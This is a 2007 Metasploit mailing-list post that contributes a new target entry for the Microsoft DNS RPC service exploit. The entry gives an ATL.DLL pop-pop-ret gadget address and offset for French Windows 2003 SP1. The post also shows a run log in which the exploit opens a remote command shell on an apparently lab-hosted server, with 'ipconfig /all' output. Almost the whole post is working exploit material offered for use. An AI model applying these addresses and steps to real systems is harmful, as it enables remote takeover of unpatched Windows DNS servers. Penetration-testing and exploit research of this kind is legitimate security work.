Metasploit mailing list archives
Exploiting the Microsoft DNS RPC service
From: fab at revhosts.net (Fabrice MOURRON)
Date: Thu, 19 Apr 2007 01:18:53 +0200
Hi,

For a Win2003 SP1 French target :

# ATL.DLL
# 76a31a60 5b pop ebx
# 76a31a61 5d pop ebp
# 76a31a62 c3 ret
[ 'Windows 2003 Server SP1 French', { 'Off' => 1633, 'Ret' => 0x76a31a60} ],

[*] Trying target Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English/ French...
[*] Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp: 192.168.0.200[0] ...
[*] Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp: 192.168.0.200[0] ...
[*] Sending exploit...
[*] Sending stage (474 bytes)
[*] Error: no response from dcerpc service
[*] Command shell session 3 opened (192.168.0.2:57601 -> 192.168.0.200:4444)

Microsoft Windows [version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>ipconfig /all
ipconfig /all

Configuration IP de Windows

   Nom de l'hôte . . . . . . . . . . : win2003fr
   Suffixe DNS principal . . . . . . : msf.local
   Type de nœud . . . . . . . . . . : Inconnu
   Routage IP activé . . . . . . . . : Non
   Proxy WINS activé . . . . . . . . : Non
   Liste de recherche du suffixe DNS.: msf.local

Carte Ethernet Connexion au réseau local :

   Suffixe DNS propre à la connexion :
   Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
   Adresse physique . . . . . . . . . : 00-0C-29-90-40-C2
   DHCP activé. . . . . . . . . . . . : Non
   Adresse IP. . . . . . . . . . . . : 192.168.0.200
   Masque de sous-réseau . . . . . . : 255.255.255.0
   Passerelle par défaut . . . . . . : 192.168.0.254
   Serveurs DNS . . . . . . . . . . : 127.0.0.1

French target for Win2003 SP2 coming soon.

@+
Fab